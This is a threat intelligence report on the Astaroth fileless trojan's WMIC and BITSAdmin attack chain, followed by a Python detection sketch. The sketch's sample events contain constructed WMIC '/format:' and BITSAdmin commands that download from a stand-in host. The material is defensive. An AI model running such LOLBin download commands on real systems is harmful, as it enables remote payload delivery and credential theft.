Threat Intelligence Report - MS “Great Duke of Hell”

Date: 9th August 2019


Since its inception in 2017, the trojan malware more commonly known as ‘Astaroth – the Great Duke of Hell’ has been stealing data through specifically targeted spear phishing attacks.

Brought to the world’s attention by the Microsoft Defender Advanced Threat Protection team, this is credential-stealing malware that is comparatively more destructive than its peers because it runs only legitimate files within the ‘attack chain’, in plain view, without installing software on the target’s machine.


This is unlikely to be the last we hear of this threat: it has already evolved from its initial form, and ‘fileless’ threats of this type regularly appear in top-10 malware and top-10 network-attack lists.

The urgency and seriousness of this malware have been highlighted by two of the main researchers familiar with it:

Andrea Lelli (Researcher) – Microsoft Defender ATP Research Team

“As is known to all, these fileless attacks are able to run the malicious payloads directly in memory or leverage legitimate system tools to run malicious code without having to drop executable files on the disk.”

Eli Salem (Security Researcher) – Cybereason

“These attacks are considered challenging to detect as the full process of the deployment and execution of the malware is by way of those Windows LOLBins. To an average person, this activity can seem like a legitimate Windows activity because it’s being executed by Windows processes.”

Tactics, Techniques and Procedures

Essentially, ‘Astaroth’ steals sensitive data (through keylogging and clipboard monitoring), removes it from the victim’s machine and sends it to a remote attacker. The stolen information is then used for further criminal activity, such as sale on the dark web or monetary theft.

The attack begins when a spear-phishing email is opened. This runs an obfuscated batch file which abuses living-off-the-land binaries (LOLBins), so the activity looks like normal operation. The LOLBin in this instance is the Windows Management Instrumentation Command-line (WMIC), which, when invoked, downloads and runs yet another obfuscated file, this time JavaScript code. The JavaScript then runs two DLL files that log and upload the target’s information while posing as a genuine system process. The next step in the ‘attack chain’ is the Background Intelligent Transfer Service (BITS) admin tool, which downloads further malware payloads.

Conventional signature-based detection tools are at the greatest disadvantage here, as the only files downloaded or installed are the DLLs. With so few files to inspect, there is little opportunity to notice the attack, let alone scan for it and stop it. Essentially, ‘Astaroth’ has flourished without resorting to traditional malware and trojan exploits.

General anti-virus software would only be able to detect the attack after the DLL files had been downloaded. However, in this scenario the DLLs use ‘code obfuscation’ and, more damagingly, can be transformed easily and quickly, which makes them even more difficult to detect.

Indicators of Compromise (IOCs)

  • A large number of WMIC invocations
  • Increases in database read volume

Vulnerable systems

All Windows Users.


Invinsec recommends the following actions:

  • Use heuristic detection tools. The main example is anti-virus software configured to closely monitor use of the WMI command line (WMIC), the tool that lets users access management information in an enterprise environment.
  • The AV must also be vigilant when DLL files are loaded, applying more stringent rules such as checking file age, memory scanning, stack-trace analysis while programs execute, and blocking recently created DLLs from running.
  • Use multi-factor authentication to reduce the risk posed by stolen credentials.
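The following is an added worked example, not code from this report, from Invinsec, or from the Microsoft or Cybereason researchers quoted above. It turns the attack chain described under Tactics, Techniques and Procedures, the WMIC-volume indicator listed under Indicators of Compromise, and the file-age rule in the recommendations into simple detection logic run over constructed endpoint events. The event field names (Image, CommandLine, ImageLoaded, FileCreationTime, UtcTime, Host), the 30-minute DLL age window, the WMIC-per-host threshold of 5 and every sample command line are assumptions made for the example; they are loosely modelled on process-creation and image-load telemetry and would need tuning against real data.

```python
"""Detection sketch for the Astaroth-style LOLBin chain described in the report.

Constructed example: events are plain dicts with assumed field names.  Rules:
  1. WMIC invoked with a remote (http/https) URL on its command line
  2. BITSAdmin used to transfer a file from a remote URL
  3. a DLL loaded only minutes after it was written to disk (file-age check)
  4. per-host WMIC invocation count over a threshold (IOC: many WMIC requests)
"""
from collections import Counter
from datetime import datetime, timedelta
import re

URL_RE = re.compile(r"https?://", re.IGNORECASE)
RECENT_DLL_MAX_AGE = timedelta(minutes=30)   # assumption: tune per environment
WMIC_PER_HOST_THRESHOLD = 5                  # assumption: tune per environment


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_process(ev):
    """Rules over one process-creation event; returns the rule names that fire."""
    hits = []
    image = _basename(ev["Image"])
    cmd = ev.get("CommandLine", "")
    # Rule 1: WMIC asked to fetch something remote (report: WMIC downloads and runs JavaScript).
    if image == "wmic.exe" and URL_RE.search(cmd):
        hits.append("wmic_remote_url")
    # Rule 2: BITSAdmin pulling a remote file (report: BITS fetches further payloads).
    if image == "bitsadmin.exe" and "/transfer" in cmd.lower() and URL_RE.search(cmd):
        hits.append("bitsadmin_remote_transfer")
    return hits


def check_image_load(ev):
    """Rule 3: a DLL loaded shortly after it appeared on disk (recommendation: file age)."""
    if not ev["ImageLoaded"].lower().endswith(".dll"):
        return []
    loaded = datetime.fromisoformat(ev["UtcTime"])
    created = datetime.fromisoformat(ev["FileCreationTime"])
    if timedelta(0) <= loaded - created <= RECENT_DLL_MAX_AGE:
        return ["recently_created_dll"]
    return []


def wmic_hosts_over_threshold(events, threshold=WMIC_PER_HOST_THRESHOLD):
    """Rule 4: hosts whose WMIC invocation count reaches the threshold."""
    counts = Counter(
        ev["Host"] for ev in events
        if ev["EventType"] == "ProcessCreate" and _basename(ev["Image"]) == "wmic.exe"
    )
    return {host: n for host, n in counts.items() if n >= threshold}


def analyse(events):
    """Run every rule over the event list; returns (host, rule, detail) tuples."""
    findings = []
    for ev in events:
        if ev["EventType"] == "ProcessCreate":
            hits, detail = check_process(ev), ev.get("CommandLine", "")
        elif ev["EventType"] == "ImageLoad":
            hits, detail = check_image_load(ev), ev["ImageLoaded"]
        else:
            hits, detail = [], ""
        findings.extend((ev["Host"], h, detail) for h in hits)
    for host, n in wmic_hosts_over_threshold(events).items():
        findings.append((host, "wmic_volume", f"{n} WMIC invocations"))
    return findings


def _proc(host, image, cmd):
    return {"EventType": "ProcessCreate", "Host": host, "Image": image, "CommandLine": cmd}


# Constructed sample telemetry: benign inventory noise plus one instance of each behaviour.
SAMPLE_EVENTS = [
    *[_proc("WS-01", r"C:\Windows\System32\wbem\WMIC.exe", "wmic.exe os get caption") for _ in range(5)],
    _proc("WS-02", r"C:\Windows\System32\wbem\WMIC.exe", "wmic.exe cpu get name"),
    _proc("WS-01", r"C:\Windows\System32\wbem\WMIC.exe",
          'wmic.exe os get /format:"https://example.invalid/constructed"'),
    _proc("WS-02", r"C:\Windows\System32\bitsadmin.exe",
          r"bitsadmin.exe /transfer job /download /priority normal "
          r"https://example.invalid/constructed.bin C:\Users\Public\constructed.bin"),
    {"EventType": "ImageLoad", "Host": "WS-01", "ImageLoaded": r"C:\Users\Public\constructed.dll",
     "UtcTime": "2019-08-09T10:02:00", "FileCreationTime": "2019-08-09T10:00:00"},
    {"EventType": "ImageLoad", "Host": "WS-02", "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "UtcTime": "2019-08-09T10:02:00", "FileCreationTime": "2018-04-11T23:34:00"},
]

if __name__ == "__main__":
    for host, rule, detail in analyse(SAMPLE_EVENTS):
        print(f"{host}\t{rule}\t{detail}")
```

Run as-is, the script reports the WMIC call carrying a URL, the BITSAdmin download, the freshly created DLL load, and WS-01 exceeding the WMIC volume threshold (six invocations), while the five routine `wmic.exe os get caption` queries and the long-standing system DLL produce nothing. The volume rule is deliberately separate from the per-event rules: on its own a single WMIC call is unremarkable, and the report’s indicator is the count, not any one request.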
